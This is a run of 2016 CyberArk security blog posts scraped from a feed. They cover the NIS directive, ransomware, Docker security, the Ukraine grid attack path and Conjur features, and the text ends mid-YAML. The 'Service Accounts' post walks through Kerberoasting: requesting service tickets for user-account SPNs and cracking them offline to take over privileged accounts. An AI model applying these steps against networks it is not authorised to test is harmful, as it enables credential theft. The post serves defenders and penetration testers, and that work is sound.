The NIS directive was adopted on May 17, 2016 and it will require operators of essential services and digital service providers in critical sectors such as energy, banking, water and health to develop programs to mitigate cyber security risks. It also imposes new requirements for collaboration amongst member states and establishes new guidelines for the reporting of major security breaches within each of their critical infrastructure sectors. The new directive goes into effect in August of 2016, but member states will have 21 months to design their national programs and six additional months to identify the affected operators of these essential services.

As we’ve seen from recent incidents such as the Ukraine power grid attack that left 225,000 customers in the dark, privileged accounts are at the center of cyber attacks and their compromise can pose a great risk to critical infrastructure. The damage from a cyber-attack is no longer contained to the digital  world as attacks can have grave consequences in the physical realm. The security of privileged accounts represents a top priority for critical infrastructure organizations in order to mitigate these risks.

It is recommended that a cyber security framework for national critical infrastructure includes a comprehensive privileged account security program as a significant step towards mitigating the risks associated with advanced persistent threats. Some recommendations to consider around privileged account security for critical infrastructure include:

  1. Understand the privileged account problem and proactively secure privileged credentials, including user and application passwords and SSH keys
  2. Keep privileged credentials from people with malicious intent and keylogging malware by establishing a secure way to connect to critical assets without revealing passwords
  3. Establish a central point of control for accessing critical systems through the isolation of privileged sessions
  4. Monitor privileged sessions and establish workflows to terminate a session if malicious activity is suspected
  5. Leverage analytics tools that can help detect anomalous activity and alert security teams of in-progress attacks
  6. Don’t neglect security at the endpoint; gain control of application permissions on endpoints and servers to reduce the damage caused by malware

Read more about practical steps to secure critical infrastructure here.

The move by the EU to establish a cyber security framework around critical infrastructure reflects the increasing risk of attack and the devastating impact that an attack could have on European infrastructure. Today, industrial enterprises increasingly view privileged account security as a strategic priority that must be included in a national cyber security strategy and deployed horizontally across critical infrastructure sectors.

]]>
New CyberArk Labs Research: Analyzing Ransomware and Potential Mitigation Strategies https://www.cyberark.com/blog/new-cyberark-labs-research-analyzing-ransomware-potential-mitigation-strategies/ Tue, 02 Aug 2016 12:55:50 +0000 https://www.cyberark.com/blog//

Reports of ransomware attacks continue to escalate, as we’ve explored in recent posts. The FBI reported that cyber criminals used ransomware to extort $209 million from enterprise organizations in the first three months of 2016 alone. This form of malware – designed to infect machines, encrypt as many files as possible and hold the decryption key for ransom until the victim submits the required payment – has skyrocketed in popularity in recent months for two key reasons:

  1. Many organizations fail to practice good hygiene when it comes to backup and recovery.
  2. Many organizations still rely on traditional anti-virus solutions, which are often not effective in blocking ransomware.

As part of an ongoing investigation, our CyberArk Labs team has tested more than 23,000 pieces of real-world ransomware to learn more about how it works and to identify alternative methods for mitigating the threat. As a result, they have identified a common prevention denominator across all tested ransomware instances to-date. This revelation, along with actionable recommendations for combatting ransomware attacks, can be found in the just-published report: “Analyzing Ransomware and Potential Mitigation Strategies.”

Five high-level findings detailed in the report:

  1. Ransomware is Evolving by the Hour: Unlike traditional malware, which is frequently reused across a wide range of targets, ransomware strains are typically mutated for each new victim. Traditional anti-virus solutions that rely on blacklists are typically ineffective in preventing ransomware because they simply can’t keep up with the thousands of new samples produced each day. To effectively protect against ransomware risks, organizations can’t just protect against known malware; they also need to protect against unknown malicious applications.
  1. A Common Path to Encryption: The team observed what actions were executed by different ransomware samples, and learned the samples across different families all followed similar subsequent processes. Typically, the malware first attempted to communicate back to an attacker-managed key server, which held the unique public key used to encrypt files on the machine. Second, the ransomware began to scan the infected machines to locate specific files types. Third, upon locating the files, the ransomware began the encryption process, while working to maximize the number of impacted machines.
  1. Ransom Payment Method of Choice: To receive the key needed to decrypt the impacted files, users were required to submit payment – the ransom – to the attackers. Payment was typically demanded in Bitcoin, and for Bitcoin novices, some attackers went so far as to set up “help desks” to help victims purchase Bitcoin and complete the funds transfer.
  1. Ransomware Seeks Admin Rights: In 70 percent of tested cases, ransomware attempted to gain local administrator rights once activated. But interestingly, only 10 percent of the tested files failed if these rights could not be attained. This shows that even though the removal of local administrator rights from standard users is a best practice and certainly could have prevented some of the ransomware, this measure must be layered with application control to reliably protect against file encryption.
  1. A Common Denominator: Testing by CyberArk Labs demonstrated that a highly effective way to mitigate the risk of ransomware attacks is to prevent unknown applications, including unknown ransomware, from gaining the read, write and edit permissions needed to encrypt files. When tested by CyberArk Labs, a combined approach of removing local admin rights and application control, including greylisting, which restricts read, write and modify permissions from unknown applications was 100 percent effective in preventing ransomware from encrypting files.

The full research report explores a number of techniques used to mitigate the risk of ransomware, outlining the pros and cons of each. Based on this extensive research, the Labs team also presents an alternative, proactive approach that to application control that, when combined with least privilege controls, can enable organizations to better protect themselves from both known and unknown threats. To learn more, download the free research report here.

 

]]>
Docker 1.12 – Another Piece In The Container Security Puzzle https://www.cyberark.com/blog/docker-1-12-another-piece-in-the-container-security-puzzle/ Mon, 01 Aug 2016 19:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/docker-1-12-another-piece-in-the-container-security-puzzle/  

Docker has taken a  welcome step toward making security easier for containerized applications. In Docker 1.12, made generally available last Friday, Docker, has been enhanced with “mutually authenticated transport layer security (TLS), providing authentication, authorization and encryption to the communications of every node participating in the swarm, out of the box.” It also automatically rotates PKI certificates for containers. All of this is enabled automatically on startup of the swarm, for secure-by-default orchestration.

The Docker 1.12 security improvements address what has been a tradeoff between deployment simplicity and risk, especially as deployments grow in complexity and scale. However, even as Docker 1.12 secures communications within and across nodes, the question of what they can do once they connect – and who within the organization can define what they can do – still needs to be resolved. These questions apply to containers, their hosts, the Docker registry, applications and services accessing the nodes, and the people responsible for managing the Docker 1.12 infrastructure.

  • What permissions do containers have to access shared host resources and secrets?
  • How are policies defined for client authorization to the Docker Registry?
  • Can token use be logged and audited?
  • Who or what gets to make changes to the Docker Engine or daemon, and how are they authenticated?
  • Who gets permission to make access policy changes, and how are changes tracked?
  • How are permissions defined to make changes to Docker processes (master, worker) based on organizational role – such as developer, QA or production?
  • How are changes and activity logged for containerized applications and management?

These security, compliance, and governance questions are not restricted to Docker – they apply from one end of the software delivery pipeline to the other, from software repos, through build, release, orchestration, and configuration management. Therefore, the container security introduced in Docker 1.12 should be seen as a piece in a larger, role-based access management solution that secures the entire software delivery pipeline consistently.

Conjur Fit for Purpose: Container Authorization

Conjur’s role based access control, secrets management and authorization policy abstraction layer fills in many of the pieces of the puzzle needed for more secure Docker orchestration across environments.

Secrets & SSH management for the entire software delivery pipeline

Conjur manages secrets (including certificates, API keys, passwords and SSH keys) in a centralized service that is easily integrated with the Docker 1.12 environment. Conjur defines, enforces, and audits compliance with authentication and authorization policies for:

  • The containers themselves,
  • Human identities managing and building applications on the Docker infrastructure,
  • and Docker machine identities (notably the Docker daemon).

The secrets management service releases secrets to the Docker controller based on authorization events, and ensures that they are regularly rotated and that access is strictly controlled and logged. For organizations that use SSH to control developer, administrator and application access, Conjur manages and audits the SSH access to the cluster nodes. Conjur also provides the authentication and authorization service for the Docker Registry, with all activity logged on the basis of issued tokens.

Least-privileged access to Docker & associated infrastructure

Conjur’s policy framework enables role-based permissions for developers and administrators that should have least privilege access to Docker and the cloud services that support container deployments. Centralized management of clearly defined policies and role-based access controls translates into consistent patterns as well as visibility into all changes made across the containerization tier.

More fundamentally, Conjur allows customers to ensure that authorization is a separate step from authentication, during which the login system determines if the authenticated user or container should be granted login access based on their access key, and what their access level should be. Here, Docker’s new authentication features can be leveraged for greater automation.

As containers are started and ‘Conjurized’  they have the ability to individually filter inbound traffic based on policy rules, ensuring no rogue services spin themselves up, and outbound traffic is contained. With all communication between containers appropriately tagged based on issued tokens, Conjur delivers complete audit records for all static and ephemeral services.

Protection for for hybrid application infrastructure

Most customers are still going to want to retain some flexibility on what platforms and environments their containerized applications run on – including hybrid cloud architectures. Docker has put containers on the map, but for larger enterprises the reality is that multiple container platforms and methodologies will co-exist or operate in parallel. This means that for security and consistency, authentication, access management and authorization should be abstracted from the underlying platform.

 

]]>
Ransomware is on the Rise https://www.cyberark.com/blog/ransomware-is-on-the-rise/ Tue, 26 Jul 2016 14:39:18 +0000 https://www.cyberark.com/blog//

Research shows that most advanced attacks today start with phishing or spam emails sent to non-privileged business users. These phishing attacks often utilize ransomware – a form of sophisticated malware that blocks access to sensitive files by encrypting them and demands payment in order for the user to access the files again. According to a recent research highlighted in a CSO article, 93 percent of all phishing emails contained encryption ransomware as of March 2016 data.

Ransomware is on the rise, and attackers increasingly use this approach to target enterprise organizations. Ransomware can be particularly challenging to combat, as once inside the network, it can compromise machines, steal data, capture credentials or damage systems all without using any administrative privileges. If an organization has removed users’ administrative rights on endpoints and servers but is not monitoring and controlling which applications are allowed to run on these machines, a rogue application containing ransomware, which does not require administrative privileges to run, can enter the infrastructure and execute in the environment. This gives attackers a foothold into the organization.

In the short video below, Jessica Stanford, CyberArk’s Senior Product Marketing Manager, shares best practices for mitigating the risk of ransomware, from employing defense-in-depth and regularly backing up files to applying a combination of least privilege and application control.

In another article, Jessica noted research the CyberArk Labs team conducted to test how CyberArk Viewfinity protects against known and unknown variants of ransomware. The team manually tested 450 specific ransomware samples from 14 different crypto families (including Cryptolocker, Petya, and Locky) – focusing on the most common and notorious ransomware strings. CyberArk Viewfinity was able to block 100% of the ransomware samples from successfully encrypting files.

 

As attackers become more adept in circumventing defenses, organizations are increasingly vulnerable to ransomware and other types of sophisticated malware. To learn more about how to strike the right balance between security and usability to effectively reduce the attack surface while keeping users productive, please visit www.CyberArk.com/Viewfinity.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

ca_ransomwareontherise_7 20 16

]]>
CyberArk Impact 2016: Implementing Privileged Account Security https://www.cyberark.com/blog/cyberark-impact-2016-implementing-privileged-account-security/ Fri, 15 Jul 2016 16:59:40 +0000 https://www.cyberark.com/blog//

Last week, we spent three action-packed days with our European customers and partners in Barcelona, kicking off the CyberArk Impact 2016 Summit series. Next week, a team from CyberArk will convene in Boston with our Americas customers and partners. These events represent the largest gathering of privileged account security experts globally and provide an opportunity for attendees to discuss the ever-changing cyber security landscape, share stories and learn best practices for bolstering privileged account security. Through interactive sessions and training, attendees learn the most effective ways to protect critical enterprise assets.

Here are six takeaways from last week’s discussions:

  • Privileged Account Security is an organizational priority: The rise in awareness about advanced threats has prompted many organizations to shore up privileged access controls in order to mitigate risks. In fact, it has become a top organizational priority for a growing number of companies in recent years.
  • Enterprise-wide initiatives are challenging: Taking the time to fully develop a strategy and business case is critical in order to overcome any obstacles.
  • Knowledge-sharing is critical: Cyber attacks have reached a level of sophistication that allows attackers to potentially evade existing security controls and access privileged credentials. Peer-to-peer guidance is invaluable in the fight against cyber attacks.
  • Stakeholder engagement is key: Typical of any comprehensive project, it’s important to secure to buy-in to what you and your team aim to achieve. Engage with stakeholders on a regular basis. In the words of one of our speakers, ‘it’s useful to have a big guy with a hammer’ too.
  • Demonstrate value through milestones: Think about how privileged account security integrates within a wider environment; chances are, it’s not feasible to get the whole infrastructure under control immediately, but it is important to show value quickly. Set early goals in conjunction with business partners, define phases to minimize business disruption and capitalize on initial successes by creating blueprints for repeatable processes.
  • Establish metrics that matter: It is crucial to define the reduction in risk the project will achieve. Senior management, the board of directors and other key stakeholders used to simply ask for assurances that things were okay – but not anymore. Now, they need risk reduction and breach scenarios to be explained. Establish metrics that they can understand, and use the metrics to steer course corrections, measure control efficiency, and assess the impact of controls on system availability and application performance.

Achieving the right balance between enabling and restricting high-levels of access to information assets is difficult, but necessary. By convening to share insights and collaborating with one another regularly, best practices emerge to address the ever changing security landscape. Next week’s event marks our 10th Annual Summit for the Americas. We look forward to the ongoing dialogue.

]]>
Privileged Account Security: a Strategic Program Not a ‘Project’ https://www.cyberark.com/blog/privileged-account-security-strategic-program-not-project/ Thu, 14 Jul 2016 20:43:37 +0000 https://www.cyberark.com/blog//

Today, enterprise IT security teams increasingly recognize that compliance does not equal security. Taking a compliance or project approach is not enough to secure a business. Although important, compliance is table stakes in the world of advanced, persistent threats. The sophistication of attackers continues to increase, and they now operate inside of networks – stealing credentials and escalating privileges to reach a goal.

Security requires much more than a “following the auditor” mentality – it requires a holistic program. A great example of this mantra can be found in a recent Computerworld article written by a security manager whose name and company were disguised for obvious reasons.  The author discusses the need for his organization to meet requirements for a tougher certification of its credit card-handling practices. Along the way, he was able to prove compliance, but he also discovered the requirements weren’t enough to protect the organization from security risks. He planned to make additional changes as a result.

Used as an attack vector in virtually every advanced targeted attack, it’s widely recognized that unprotected privileged accounts and credentials present critical risks to enterprises. It has become clear that in order to truly protect an organization’s data – and business – from devastating breaches, these privileged accounts and credentials must be secured and managed in order to limit the damage of an attack, to stop lateral movement and to avoid complete network takeovers.

In a short video, CyberArk CMO John Worrall explains that organizations increasingly view privileged account security as a strategic priority – and launch programs not tactical projects. Today, many C-level security professionals have enterprise-wide mandates to address what is now widely viewed as a horizontal risk. Businesses must adapt – add a new layer of security inside the network to secure the IT systems. Businesses run on IT, so the stakes are high if trust is not established and maintained.  Watch the video.

]]>
Don’t Overlook the Insider Threat, Protect Privileged Access https://www.cyberark.com/blog/dont-overlook-insider-threat-protect-privileged-access/ Fri, 08 Jul 2016 15:30:28 +0000 https://www.cyberark.com/blog//

A newly released Ponemon Institute study revealed that 72 percent of surveyed organizations are not confident in their ability to manage and control employee access to high-value information, such as trade secrets, new product designs, merger and acquisition activity, financial data and confidential business information. Additionally, the report pointed to privileged company insiders as the biggest threat to enterprises today. Think of the game-changing Snowden revelations or the more recent Panama Papers incident – examples of insiders with access to highly sensitive company information who leaked information to the public.

The same week the Ponemon survey was published, new developments in the highly publicized Morgan Stanley insider data breach emerged, underscoring the severity – and far-reaching consequences – of malicious, privileged insider attacks. To summarize the breach, in 2014 a Morgan Stanley financial adviser gained access to, then illicitly downloaded, customer data from 730,000 customer accounts. He was able to reach these accounts by utilizing privileged credentials that were not properly protected. After he transferred this information to a personal server, a third party breached the system and posted the information for sale on the Internet. After a two-year investigation of the incident – which some experts say was the biggest data theft at a wealth management firm to-date – the SEC determined that Morgan Stanley failed to sufficiently safeguard its customer data from unauthorized access. The company was issued a cease-and-desist order and was fined $1 million – a penalty that demonstrates the SEC’s heightened focus on cyber security.

This case is significant as it represents one of the first times a major industry player – also technically the “victim” of the attack – has been penalized for violating the Safeguards Rule, which requires financial organizations to adopt written policies and procedures reasonably designed to safeguard customer records and information from threats that include unauthorized access. In this particular case, the employee used privileged access to information and blatantly violated company policy. Often the “insider threat” isn’t as black and white as this. Security professionals must be constantly vigilant for many different threats inside the organization – from malicious contractors who have authorized access, to former employees who still have privileged access to business critical systems, to employees at risk of causing unintentional abuse.

To effectively minimize the insider threat, it’s important to first realize that it doesn’t matter where an attack starts or from whom. What matters is that privileged access – not people – is the true insider threat. Once this is understood, it’s critical to implement privileged account security solutions that offer insider threat protection to:

  • Ensure that only authorized users are able to access powerful privileged accounts
  • Prevent users from being able to gain unapproved elevated privileges
  • Establish strict accountability over the use of privileged accounts by tracking who accessed what accounts and what actions were taken
  • Improve forensic analysis and by generating a detailed, tamper-proof audit trail of all privileged account activity
  • Rapidly detect, and be alerted on, anomalous activity that could signal an inside attack in-progress

Learn about more about how the CyberArk Privileged Account Security Solution helps organizations to proactively limit user privileges and control access to privileged accounts to reduce the risk of an insider attack here on our website.

]]>
Lessons Learned from the Ukraine Blackout: 5 Best Practices for Locking Down Privileged Accounts https://www.cyberark.com/blog/lessons-learned-ukraine-blackout-5-best-practices-locking-privileged-accounts/ Wed, 29 Jun 2016 13:11:29 +0000 https://www.cyberark.com/blog//

CyberArk’s cybersecurity researcher Lavi Lazarovitz wrote about some of the key steps attackers took to cause a black out in the Ukraine. By examining the attack path, we’ve identified five best practices for locking down privileged access that when followed can help to mitigate risk:

  1. Proactively secure all privileged and ICS credentials: From the IT admin accounts that were compromised in the early phases of the attack to the VPN accounts used to connect to the OT network, the utility companies should have had stronger controls in place to limit access to these powerful system accounts. In addition, proactive scans for privileged accounts and credentials could have helped the companies detect and remove the unauthorized SSH keys that the attackers created to establish persistent access.
  1. Rotate admin credentials after each use: Frequent rotation can stop lateral movement by invalidating credentials that may have been captured. In this case, the attackers could have stolen the admin credentials from the infected endpoints, but as soon as the credentials were rotated, these compromised passwords would have been useless.
  1. Establish a single, controlled access point into ICS systems: In ICS environments, particularly those that control critical infrastructure such as energy, transportation or water, it’s critical that organizations do everything they can to limit and control access to systems. By forcing all ICS users through a single access point, requiring multi-factor authentication, and closing down all other routes into the control systems, companies can reduce the attack surface of critical systems, granularly control exactly who is able to access what systems, and limit the permissions that each operator has on each system. In addition, with all traffic flowing through one location, organizations can monitor and audit exactly who did what and gain the opportunity to detect attacks before they become serious.
  1. Monitor privileged account use to detect anomalies: In this case, the attackers were able to avoid detection for months by masquerading as true users with authorized credentials. However, their behavior was likely very different than that of true users. Behavioral analytics tools can detect anomalous activity and alert security teams to possible attacks in progress. Had the utility companies been monitoring privileged account behavior, they likely would have detected the attackers well in advance of the blackout and system destruction.
  1. Control applications to reduce the risk of malware-based attacks: By controlling application permissions on endpoints and servers, organizations can reduce the damage caused by malware. For example, by restricting untrusted applications from accessing files, the KillDisk malware would not have been able to access and overwrite files throughout the IT environment, thus significantly limiting damage to IT systems.

While this was a sophisticated, highly coordinated attack, proactive privileged account controls layered with behavioral analytics tools, such as those CyberArk provides, could have helped the energy companies block lateral movement early on, detect if the attackers were able to capture credentials, and ultimately, prevent the end goal of a massive, unprecedented blackout.

For more information, join CyberArk for a 20 minute debrief analysis on the Ukraine Power Grid Attack on July 27, 2016 at 2:00 pm ET. Register here: https://lp.cyberark.com/2016.07.27UkrainePowerGridAttackDebrief_LandingPage.html

 

 

 

 

]]>
The Ukraine Blackout: Four Key Moves the Attackers Made https://www.cyberark.com/blog/ukraine-blackout-four-key-moves-attackers-made/ Wed, 29 Jun 2016 13:06:31 +0000 https://www.cyberark.com/blog// On December 23, 2015, the western region of Ukraine experienced a sweeping blackout.  Two of the three electricity providers in the area fell victim to a cyber attack that shut off electricity throughout the region and purposely made remediation extremely difficult.  An estimated 225,000 residents throughout Ukraine were left in the dark, IT and OT systems were completely overwritten, and the power companies were left to manually fix damage at impacted substations throughout the region.

As we’ve outlined in previous posts, the use of stolen privileged credentials to remotely access critical industrial control systems (ICS) assets is the most common threat to power grids. In this article, we’ll highlight some of the key steps the attackers took to carry out their plan.

Step 1: Perimeter Compromise

The network perimeter was compromised via a spear phishing campaign, in which the attackers disguised themselves as legitimate system vendors and members of the government. They sent phishing emails to IT staff and system administrators at the utility companies and employees at targeted companies.

Believing the emails were legitimate, the individual victims opened the emails and the attached Microsoft Office documents, which contained a malicious macro. Though Microsoft prompted the users to verify if they wanted to run the macro, the employees complied since they believed the email was legitimate. As soon as the users opened the malicious macro, the malware installed itself on the users’ machines. The malware immediately installed a RAT, established a connection with its Command and Control server and began sending information to the C&C.

At this point, a secondary piece of malware known as KillDisk was installed in a dormant state. This KillDisk malware was capable of overwriting the vast majority of files on all infected systems and rendering each system unbootable. From there, the attackers began the reconnaissance phase of the attack. They used their remote access to log into systems and guess and steal credentials until they eventually captured admin credentials.

Step 2: Lateral Movement and Escalation

Using the compromised admin credentials, the attackers began moving laterally through the IT environment. Because they were masquerading as true, authorized users, they were able to stay under the radar of intrusion detection systems. As the attackers moved, they continued to install the KillDisk malware for use at a later time, and where necessary, set up SSH backdoors to ensure persistent remote access, just in case.

As the attackers roamed the network, they discovered that the back office workstations used to control the electric breakers could be accessed over an internal VPN.  Contrary to best practices, these systems were not air-gapped, and VPN access only required single factor authentication.

Using compromised credentials, the attackers logged into the VPN to remotely connect to workstations in the control room. For several weeks, the attackers simply watched and learned. They learned how the operators accessed and controlled the systems, and how updates were remotely applied to systems in the field. Prior to the final stages of attack, not only did the attackers continue to spread the KillDisk malware through the IT environment, but they also applied the malware to the grid systems via a firmware update and tested it to make sure that it would work.

Step 3: Attack Execution

When the attack team was ready, the attackers began to execute against their end goal: take down power across the Ukraine and disrupt remediation. The attackers took control of workstations in the control room and remotely disabled the mice and keyboards, so that system operators could not intervene in the event they noticed the takeover.

From the workstations, the attackers logged into the Human Machine Interface (HMI), which served as the UI to control the grid systems, and disconnected systems, opened breakers, and shut down electricity at 30 substations. The attackers next disabled backup power supplies to two of the three energy distribution centers. As the power went out throughout the Ukraine, the system operators were left without the ability to take back control of their machines and stop the attack.

Step 4: Proactively Block Remediation Efforts

As the final step, the attackers did their best to prevent a swift remediation of the incident.  First, they launched a DDoS attack against the companies’ call centers, overwhelming the phone lines, so that customers were unable to reach the power companies to report the outages.  This was done so that, in the event the companies did not see the machine takeover and detect the attack, customers would be unable to call in to report the outages.  This significantly delayed the time to detection for one of the victim utility companies.

Second, the attackers activated the KillDisk malware that was previously installed on both the IT systems and the grid systems. In the IT environment, the malware overwrote approximately 40 file types on all infected systems and then wiped the hard drives. In the OT environment, KillDisk was installed and activated on sixteen substations, leaving them unresponsive to remote commands by operators. Without functioning IT or OT systems, the utilities were delayed from remediating the incident and restoring service. To finally get electricity back up and running, utility workers had to drive to the power stations to manually reset the breakers. Even three months following the attack, workers must still manually control the breakers at the impacted substations.

The role of privilege in this historic cyber attack was significant for three major reasons. First, the attackers were able to guess and capture administrative credentials from infected endpoints. Second, using the compromised and static credentials, the attackers moved laterally throughout the environment, escalated privileges and installed SSH backdoors along the way.  This enabled persistent, privileged access to the network, and eventually enabled the attackers to VPN into the OT environment from the IT environment. And finally, using privileged access, the attackers shut down power systems, corrupted OT systems, and wiped endpoints and servers throughout the IT environment – leaving residents in the dark and leaving power companies with little ability to easily restore electricity.

It’s important to understand the attack path, and use the lessons learned to improve proactive security measures. For more information, read Lauren Horaist’s article, “Lessons Learned from the Ukraine Blackout: 5 Best Practices for Locking Down Privileged Accounts”

]]>
Webcast: DevOps, Security, and Compliance – No BS Edition https://www.cyberark.com/blog/webcast-devops-security-and-compliance-no-bs-edition/ Tue, 28 Jun 2016 19:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/webcast-devops-security-and-compliance-no-bs-edition/  

Join us for a live webcast Wednesday June 29 at 2PM eastern on securing your DevOps pipeline.

Security_for_the_DevOps_Toolchain.pngHigh-performing organizations deploy code continuously – 30x more often with 50% fewer failures.

What about continuous security?

Speed helps to boost an enterprise’s productivity, profitability, and market share. To keep innovation and speed in an upward trajectory, DevOps teams use the latest tools and processes to scale. But many of these tools lack information security best practices to the dismay of security and compliance teams.

Elizabeth Lawler demonstrates how to bring DevOps, security, and compliance teams together, bridging this gap and forging a secure infrastructure for your company.Topics:

  • Getting DevOps, Security & Compliance on the same page
  • Meaningful security & compliance metrics
  • Access policies & enforcement for code, machines, and people
  • Ensuring a full audit log for compliance
  • Tales from the wild – how DevOps leaders succeed with these practices
]]>
Service Accounts – Weakest Link in the Chain? https://www.cyberark.com/blog/service-accounts-weakest-link-chain/ Thu, 23 Jun 2016 18:16:36 +0000 https://www.cyberark.com/blog//

At DerbyCon 2014, Tim Medin introduced a novel technique to elevate privileges by exploiting service accounts in Windows networks leveraging Active Directory and Kerberos. This method requires the service to be executed in the security context of a user account and support Kerberos authentication. It allows an attacker to request a Kerberos ticket for the vulnerable service instance (SPN) and potentially crack the ticket offline to recover the service’s secret key. Using that key, an attacker could forge an arbitrary ticket (Silver Tickets) and deceive the service to believe that the authenticating account is another user or has different group memberships.

Inspired by Medin’s work, CyberArk Labs developed RiskySPNs, an open-source tool presented at BSidesSF, which identifies vulnerable services and service accounts. The tool enables blue teams to mitigate this threat and red teams to detect and abuse the services and service accounts. Unlike other projects such as Kerberoast, RiskySPNs facilitates the identification of which accounts are most vulnerable and valuable by gathering a variety of information about the vulnerable services and the service account that runs them. This also increases the cracking efficiency and avoids unnecessary abnormal traffic and event logs on the Domain Controller.

Overview

Services in Windows networks are usually ‘kerberized’ (i.e. support Kerberos authentication) and are registered under a security principal (user or computer account) as a Service Principal Name (SPN) on the Active Directory. This enables Kerberos clients to uniquely identify the instance of the service and request a Kerberos service ticket (also called ticket granting service or TGS) to it. This ticket will be encrypted using the service’s long-term secret key derived from the security principal’s password.

Using Microsoft’s built-in tool, it is possible to query the Active Directory and retrieve all available SPNs in the user’s domain/forest.

1-SetSPN

Retrieving tickets

Because Kerberos only deals with authentication and each service is responsible for authorizing clients, any domain user can request a Kerberos service ticket (TGS) from a Domain Controller to any service even if he doesn’t actually have permissions or have the intention to access the service. In fact, the service (or server) doesn’t have to be available to retrieve a valid ticket. Using the Get-TGSCipher function from RiskySPNs module, it is easy to obtain a service ticket for a service instance by its SPN.

2-GetTGSCipher

The security principal (Target) that represent this service instance is retrieved by querying the Active Directory and identifying SPN registered SPN. The encryption type and the encrypted server’s portion of the ticket (EncTicketPart) are extracted from the ticket request stream. Typically it will require multiple tools like Mimikatz to export the ticket (kirbi file) from the client’s memory and extract the encrypted server portion from the ticket. This portion is encrypted with the secret key derived (hashed) from the password of the security principal associated with the SPN.

Detecting vulnerable SPNs

SPNs associated with computer accounts are not feasible to crack because they use rotated, complex random-generated passwords by default. However, user accounts are likely to contain guessable (non-random, relatively short) passwords. Regardless of the domain function level or the host’s Windows NT version, SPNs that are registered under a user account will use the old RC4-HMAC encryption suite instead of the newer AES cryptography which is used by default since Windows Server 2008/Vista. The key used for encryption and decryption of the RC4-HMAC (23) encryption type is just an unsalted NTLM hash version of the account’s password. This is probably because of backward capabilities concerns and interoperability.

Service accounts are often privileged and the passwords are set to never expire. Web and Database services often integrate with Kerberos to enable SSO and are running in the security context of a privileged user account. The Find-PotentiallyCrackableAccounts is another script in the RiskySPNs module that queries the Active Directory and reveals juicy information about user accounts associated with SPNs. The function checks the group memberships of the user and determines if he is a member of a sensitive group (such as Domain Admins). It also highlights the user’s encryption, and if there is a cracking window, the user will be forced to reset his password.

3-FindPotentiallyCrackableAccounts

Additionally the Export-PotentiallyCrackableAccounts script can be used to export even more data about risky user accounts and their associated SPNs to a CSV file for further analysis (useful for blue teams).

Cracking the ticket

With the encrypted portion in hand and when encryption type is known, it possible to crack the ticket offline. When the service is running under an account created by a human, it will probably have a password which could be cracked. Because the ticket is encrypted using a symmetric encryption, it possible to make a dictionary or brute-force attack by deriving (hashing) keys from a list of passwords and trying to decrypt the ticket with them. The key that successfully decrypt the ticket (the output contains a valid ticket structure) is certainly derived from the service account clear-text password. Both Hashcat and John the Ripper, two well-known password crackers tools, support Kerberos service ticket (TGS_REP/AP_REQ) cracking modes.

4-JtR

Cracking the ticket could allow an attacker to efficiently escalate privileges by creating Silver Tickets (will be described in another blog post) or simply impersonate the service account by logging in with the appropriate credentials.

Because queries to the Active Directory and Kerberos service tickets requests are both legitimate actions which occur all the time, such reconnaissance should not trigger any suspicion (unless you request a lot of tickets). From an attacker perspective, identifying SPNs associated with user accounts that are a member of a sensitive group, configured to use RC4-HMAC encryption and have a cracking window would be a potential gold (or actually a silver) mine. These service accounts are often predictable, discoverable and accessible from anywhere in the network increasing the probability of an attacker to choose them over other attack vectors.

References:

Service Principal Names

Attacking Kerberos: Kicking the Guard Dog

Kerberoast 

Active Directory Security

 

 

]]>
Reinforcing the Identity Perimeter https://www.cyberark.com/blog/reinforcing-identity-perimeter/ Thu, 16 Jun 2016 14:08:31 +0000 https://www.cyberark.com/blog//

Identities and their credentials are considered to be a major vulnerability. It’s been well documented, that nearly all advanced attacks investigated involved stolen credentials, and whenever possible, attackers go after privileged credentials. So it comes as no surprise that companies seek to reinforce new identity perimeters by extending their IAM solution visibility and control to privileged users, applications and access entitlements.

As part of the C³ Alliance, leading Identity and Access Management (IAM) solution providers have integrated their solutions with CyberArk Privileged Account Security to give mutual customers unified identity and access governance solutions for all identity types – privileged and non-privileged users and applications.

With the joint solution in place, companies can fully manage privileged users and application entitlements lifecycles through their IAM solution. They can effectively create, review and approve privileged user access permissions based upon group affiliations, roles and other commonalities directly from the IAM solution. What’s more, all privileged access requests are verified using an automated approval workflow.

To address common risks and challenges, companies can update user or group access privileges directly from the IAM solution to avoid orphan privileged accounts, privileged entitlement creep and excessive privileged permissions. Consider this scenario, an Oracle Database Administrator, who is a privileged user, is also granted access to MS-Windows domain accounts while retaining previous access privileges to root accounts. This dual access may constitute a Segregation-of-Duties (SoD) violation, which can result in more than a failed audit. Leveraging the CyberArk integrated solution, the IAM system will be able to alert on SoD violations, so that user access permissions can be updated. Performing periodic reviews and re-certification of privileged access directly from IAM is also possible.

To effectively manage all privileged identities, accounts used by commercial-of-the-shelf (COTS) applications and custom/in-house applications must also be considered. Many organizations often overlook the fact that these applications are also granted administrative privileges to access many assets on the network. Whether it’s a financial management application, inventory discovery software or a vulnerability and compliance management solution, they are all granted administrative privileges by the organization to access sensitive assets on the network.

For example, in order for a vulnerability assessment tool to execute an authenticated scan, a domain admin account or a service account credential is used to access the file system on the target machine. Therefore, IAM solutions should also provide users with visibility and control of access permissions for applications. Defining application access permissions and the ability to manage these accounts automatically is key, as well as enforcing any permission changes to ensure the application can only access authorized assets.

To learn more about CyberArk partnerships with leading IAM vendors, click here

C³ Alliance: SailPoint & CyberArk

C³ Alliance: RSA, The Security Division of EMC & CyberArk

 
]]>
What’s New in Conjur 4.7 https://www.cyberark.com/blog/whats-new-in-conjur-4-7/ Mon, 13 Jun 2016 17:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/whats-new-in-conjur-4-7/  

We are proud to announce the release of Conjur 4.7! Conjur is privileged access management and security software that helps digital businesses secure access to the thousands of system resources that compose modern applications.

This release focuses on enhancing Conjur’s core functionality with several new features and improving the scalability of existing systems. Highlights include:

Please see the full 4.7.0 release notes for more details and the full list of changes in this release.

Read on to learn more about the major new features in Conjur 4.7.


 

Built-in rotators for secrets

The longer a secret remains unchanged, the more vulnerable it becomes. The way to mitigate any risk of compromise is to use a complex secret and to change it often. The Conjur rotator service meets this requirement by automatically generating and rotating the secrets used to access an underlying system.

Rotation in the Conjur UI

Rotators released in Conjur 4.7 enable rotation of these targets:

Rotation is enabled by annotating variables with the rotator to use and a TTL (how often to rotate).
For example, setting up rotation of AWS credentials with Conjur policy:

---
- !policy
  id: aws
  body:
   - !variable region
   - !variable access_key_id
   - !variable
